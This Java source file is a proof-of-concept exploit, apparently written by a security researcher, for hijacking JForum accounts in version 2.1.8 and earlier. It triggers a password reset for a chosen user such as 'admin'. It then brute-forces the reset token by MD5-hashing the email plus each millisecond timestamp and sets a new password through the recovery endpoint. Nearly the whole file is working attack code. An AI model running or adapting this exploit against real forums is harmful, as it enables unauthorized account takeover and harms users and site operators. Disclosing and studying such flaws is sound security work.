/**
 * ThereIsNoSpoon.java
 * 
 * Program for hacking JForum accounts, version 2.1.8 and lower. Way older
 * versions may need some tweaking.
 * 
 * - Arshan Dabirsiaghi (arshan.dabirsiaghi@aspectsecurity.com)
 */

import java.io.IOException;
import java.security.MessageDigest;

import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpException;
import org.apache.commons.httpclient.methods.PostMethod;


public class ThereIsNoSpoon {

	public static String 	HOST_TO_ATTACK = "localhost";
	public static int 		PORT_TO_ATTACK = 8080;
	public static String 	CONTEXT_OF_JFORUM = "JForum";
	
	public static int 		USER_ID_TO_HIJACK = 1;
	public static String 	USER_NAME_TO_HIJACK = "admin";
	public static String 	USER_EMAIL_TO_HIJACK = "";
	
	public static String 	USER_NEW_PASSWORD = "lololoollllol";

	public static String 	FAIL_MSG = "The supplied data is invalid.";
	public static String 	SUCCESS_MSG = "Your password was updated";
	
	/**
	 * The main() method for the program, skeleton style.
	 */
	public static void main(String[] args) throws Exception {
		
		/*
		 * Step 1: request a password recovery.
		 */
		long startTime = System.currentTimeMillis();
		
		claimLostPassword(USER_NAME_TO_HIJACK);
		
		long endTime = System.currentTimeMillis();
		
		/*
		 * Step 2: loop through possible hashes, and await success.
		 */
		boolean hacked = false;
		
		for(long i=startTime;i<endTime;i++) {
		
			String possibleHash = generateHash(USER_EMAIL_TO_HIJACK, i);
			
			hacked = checkPossibleHash(possibleHash);
			
			if ( hacked ) {
				System.out.println("[2] Hacked pw! Correct hash was: " + possibleHash);
				i=endTime;
			}
		}
		
		if ( !hacked ) {
			System.out.println("[2] Failed: tried times from " + startTime + " to " + endTime);
		}
	}

	/*
	 * Function that will connect to the host and check to see if a given hash
	 * is a user's "secret" forgot password token.
	 */
    private static boolean checkPossibleHash(String possibleHash) throws IOException {
    	
        final String baseUrl = "http://" + HOST_TO_ATTACK + ":" + PORT_TO_ATTACK + "/"
        + CONTEXT_OF_JFORUM + "/jforum.page";

        PostMethod recoverAttempt = new PostMethod( baseUrl );
        recoverAttempt.addRequestHeader( "Referer", "http://localhost:8080/JForum/user/recoverPassword/" + possibleHash + ".page");
        recoverAttempt.addParameter( "module", "user" );
        recoverAttempt.addParameter( "action", "recoverPasswordValidate" );
        recoverAttempt.addParameter( "recoverHash", possibleHash );
        recoverAttempt.addParameter( "email", USER_EMAIL_TO_HIJACK );
        recoverAttempt.addParameter( "newPassword", USER_NEW_PASSWORD );
        recoverAttempt.addParameter( "confirmPassword", USER_NEW_PASSWORD );
        recoverAttempt.addParameter( "login", "OK" );        
        
        HttpClient client = new HttpClient();
        
        try {
        	
        	client.executeMethod( recoverAttempt );
        	String response = recoverAttempt.getResponseBodyAsString();
        	
        	if ( ! response.contains(FAIL_MSG) &&
        		   response.contains(SUCCESS_MSG)) {
        		return true;
        	}
        	
        } catch (HttpException he) {
        	he.printStackTrace();
        }

        return false;
	}

	private static void claimLostPassword(String userName) throws IOException {
		
		final String baseUrl = "http://" + HOST_TO_ATTACK + ":" + PORT_TO_ATTACK + "/"
        + CONTEXT_OF_JFORUM + "/jforum.page";
		
		PostMethod resetPasswordAttempt = new PostMethod( baseUrl );
		resetPasswordAttempt.addRequestHeader( "Referer", "http://localhost:8080/JForum/user/lostPassword.page");
		resetPasswordAttempt.addParameter( "module", "user" );
		resetPasswordAttempt.addParameter( "action", "lostPasswordSend" );
		resetPasswordAttempt.addParameter( "email", USER_EMAIL_TO_HIJACK );
		resetPasswordAttempt.addParameter( "login", "OK" );
		resetPasswordAttempt.addParameter( "username", userName );
	
		HttpClient client = new HttpClient();
		
		try {
        	
        	client.executeMethod( resetPasswordAttempt );

        	System.out.println("[1] CLAIMED PASSWORD WAS LOST");
        	
        } catch (HttpException he) {
        	System.err.println("Could not fire password reset");
        	he.printStackTrace();
        	System.exit(1);
        }

	}


	private static String generateHash( String email, long time ) throws Exception
	{
		String hash = airquotescryptairquotes( email + time );
		return hash;
	}


	/*
	 * This method, verbatim, is part of JForum, written by Rafael Steil.
	 * http://www.jforum.net
	 */
    public static String airquotescryptairquotes( String str ) throws Exception
    {
        if ( str == null || str.length() == 0 )
        {
            throw new IllegalArgumentException(
                    "String to encript cannot be null or zero length" );
        }

        StringBuffer hexString = new StringBuffer();

        MessageDigest md = MessageDigest.getInstance( "MD5" );
        md.update( str.getBytes() );
        byte[] hash = md.digest();

        for ( int i = 0; i < hash.length; i++ )
        {
            if ( ( 0xff & hash[i] ) < 0x10 )
            {
                hexString.append( "0"
                        + Integer.toHexString( ( 0xFF & hash[i] ) ) );
            }
            else
            {
                hexString.append( Integer.toHexString( 0xFF & hash[i] ) );
            }
        }

        return hexString.toString();
    }
}